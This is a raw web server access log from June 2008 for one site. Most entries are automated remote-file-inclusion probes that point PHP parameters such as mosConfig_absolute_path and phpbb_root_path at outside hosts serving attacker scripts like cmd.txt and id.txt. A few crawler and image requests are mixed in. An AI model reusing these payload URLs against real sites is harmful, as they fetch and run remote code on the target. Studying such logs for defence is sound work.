80.67.20.173 - - [11/Jun/2008:11:15:37 -0700] "GET /logs/access_080131.log//modules/TotalCalendar/about.php?inc_dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:11:15:46 -0700] "GET /logs/access_080308.log//errors.php?error=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:11:15:46 -0700] "GET //errors.php?error=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:11:15:46 -0700] "GET /logs//errors.php?error=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:11:15:48 -0700] "GET /logs/access_080308.log//errors.php?error=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:11:15:48 -0700] "GET //errors.php?error=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:11:15:48 -0700] "GET /logs//errors.php?error=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:11:15:52 -0700] "GET /logs/access_080110.log//errors.php?error=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:11:15:54 -0700] "GET /logs/access_080110.log//errors.php?error=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.67.79 - - [11/Jun/2008:11:16:05 -0700] "GET /logs/access_070921.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.67.79 - - [11/Jun/2008:11:16:21 -0700] "GET /minamijewelry/html/images/moon_character.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:16:21 -0700] "GET /logs/access_080107.log//oneadmin/photogallery/include.php?path[docroot]=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:16:21 -0700] "GET /logs/access_080107.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:16:23 -0700] "GET /home.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:16:23 -0700] "GET /logs/home.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:16:23 -0700] "GET /home.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:16:26 -0700] "GET /logs/home.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.234.21.89 - - [11/Jun/2008:11:16:37 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
218.234.21.89 - - [11/Jun/2008:11:16:37 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://museo.infoitos.com//components/com_rwcards/y.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:17:36 -0700] "GET /logs/access_080513.log/header.php?mainpath=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:18:05 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:18:06 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:11:18:14 -0700] "GET /logs/access_080129.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:11:19:12 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:11:19:13 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:11:19:13 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.25.230.39 - - [11/Jun/2008:11:19:13 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
87.106.209.176 - - [11/Jun/2008:11:19:46 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tverdal.info/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
87.106.209.176 - - [11/Jun/2008:11:19:46 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.tverdal.info/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:19:53 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:11:20:45 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:11:21:29 -0700] "GET /logs/start.php?s=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:11:21:30 -0700] "GET /logs/start.php?s=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:11:21:30 -0700] "GET /start.php?s=ftp://193.253.223.43/tmp/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:11:21:31 -0700] "GET /start.php?s=ftp://193.253.223.43/tmp/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:22:04 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:22:05 -0700] "GET //skin/zero_vote/error.php?dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:22:05 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:22:28 -0700] "GET /logs/access_080102.log//skin/zero_vote/error.php?dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:23:35 -0700] "GET /logs/access_080312.log//modules/My_eGallery/public/displayCategory.php?basepath=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:23:35 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:23:36 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:11:23:40 -0700] "GET /logs//errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:11:23:40 -0700] "GET //errors.php?error=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [11/Jun/2008:11:23:48 -0700] "GET /logs/access_080118.log//include/bbs.lib.inc.php?site_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [11/Jun/2008:11:23:48 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [11/Jun/2008:11:23:49 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:23:49 -0700] "GET //skin/zero_vote/error.php?dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:11:23:50 -0700] "GET /logs/access_080312.log//newspublish//errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:11:23:50 -0700] "GET //newspublish//errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:11:23:50 -0700] "GET /logs//newspublish//errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.126.108.198 - - [11/Jun/2008:11:24:11 -0700] "GET /logs/access_080418.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.lasalle-francia.cl/cache/%20%20%20/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.135.148.159 - - [11/Jun/2008:11:24:17 -0700] "GET /bikes/dteel/2008-05-30/IMG_4636M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
12.135.148.159 - - [11/Jun/2008:11:24:17 -0700] "GET /bikes/dteel/2008-05-30/IMG_4639M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
12.135.148.159 - - [11/Jun/2008:11:24:17 -0700] "GET /bikes/dteel/2008-05-30/IMG_4644M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
12.135.148.159 - - [11/Jun/2008:11:24:17 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=42196" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:24:23 -0700] "GET /menu.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:24:24 -0700] "GET /logs/menu.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:24:24 -0700] "GET /menu.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:11:24:24 -0700] "GET /logs/menu.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.20.46.121 - - [11/Jun/2008:11:24:31 -0700] "GET /logs/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [11/Jun/2008:11:24:31 -0700] "GET /errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.64.164 - - [11/Jun/2008:11:24:44 -0700] "GET /logs/access_080215.log/index.php?page=&lang=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [11/Jun/2008:11:24:49 -0700] "GET /index.php?page=&lang=http://thefantasyclub.net/id.txt? HTTP/1.1" 200 18399 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.164 - - [11/Jun/2008:11:24:49 -0700] "GET /logs/index.php?page=&lang=http://thefantasyclub.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:11:25:56 -0700] "GET //errors.php?error=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:27:04 -0700] "GET //download.php?upload_filename=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:11:27:04 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
203.22.204.80 - - [11/Jun/2008:11:27:08 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.80 - - [11/Jun/2008:11:27:09 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:11:27:53 -0700] "GET //errors.php?error=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.34.78.106 - - [11/Jun/2008:11:28:01 -0700] "GET /logs/access_080106.log//include/bbs.lib.inc.php?site_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.1.202.61 - - [11/Jun/2008:11:28:05 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:11:28:13 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:11:28:13 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:28:17 -0700] "GET /logs/access_071212.log//modules/My_eGallery/public/displayCategory.php?basepath=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
65.55.211.20 - - [11/Jun/2008:11:29:05 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.20 - - [11/Jun/2008:11:29:05 -0700] "GET /logs/access_080323.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
207.58.171.40 - - [11/Jun/2008:11:29:22 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.donchaos.com/components/com_zoom/classes/iptc/makernotes/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.171.40 - - [11/Jun/2008:11:29:22 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.donchaos.com/components/com_zoom/classes/iptc/makernotes/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.171.40 - - [11/Jun/2008:11:29:23 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.donchaos.com/components/com_zoom/classes/iptc/makernotes/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.213.236 - - [11/Jun/2008:11:29:23 -0700] "GET /logs/access_080217.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.236 - - [11/Jun/2008:11:29:28 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 200 18541 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.236 - - [11/Jun/2008:11:29:28 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:29:48 -0700] "GET /logs/access_080217.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:29:51 -0700] "GET /index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.ffshrine.org/iplog???? HTTP/1.1" 200 18509 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:29:52 -0700] "GET /logs/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:30:38 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:30:39 -0700] "GET //skin/zero_vote/error.php?dir=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:11:30:44 -0700] "GET /logs/access_071230.log//squirrelcart/cart_content.php?cart_isp_root=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
84.19.184.14 - - [11/Jun/2008:11:30:56 -0700] "GET /logs/access_080212.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.ffshrine.org/iplog???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.242.135 - - [11/Jun/2008:11:31:37 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [11/Jun/2008:11:31:38 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:11:31:47 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://powderpuffsquad.com//images/press/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:32:26 -0700] "GET //language/lang_german/lang_main_album.phphttp://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.115.213.236 - - [11/Jun/2008:11:32:53 -0700] "GET /logs/access_080212.log/index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.28.7.24 - - [11/Jun/2008:11:33:13 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
196.28.7.24 - - [11/Jun/2008:11:33:15 -0700] "GET //skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:34:08 -0700] "GET /logs/access_071219.log//language/lang_german/lang_main_album.phphttp://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:34:09 -0700] "GET //language/lang_german/lang_main_album.phphttp://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:34:09 -0700] "GET /logs//language/lang_german/lang_main_album.phphttp://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.173 - - [11/Jun/2008:11:34:10 -0700] "GET /logs/access_071130.log//language/lang_german/lang_main_album.phphttp://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:11:34:39 -0700] "GET /logs/access_071225.log//newspublish//errors.php?error=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:11:36:08 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:11:36:09 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.20.46.121 - - [11/Jun/2008:11:36:57 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [11/Jun/2008:11:37:14 -0700] "GET /logs/access_080115.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.72.181.15 - - [11/Jun/2008:11:37:36 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [11/Jun/2008:11:37:36 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:38:24 -0700] "GET /logs/access_080428.log/admin.panoramic.php?mosConfig_live_site=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:38:25 -0700] "GET /admin.panoramic.php?mosConfig_live_site=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.140.19.142 - - [11/Jun/2008:11:38:25 -0700] "GET /logs/admin.panoramic.php?mosConfig_live_site=http://nmbsquad.freehostia.com/f1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
130.102.113.158 - - [11/Jun/2008:11:39:02 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:11:39:11 -0700] "GET /logs/access_080330.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:11:39:11 -0700] "GET /logs/access_080330.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:11:39:12 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
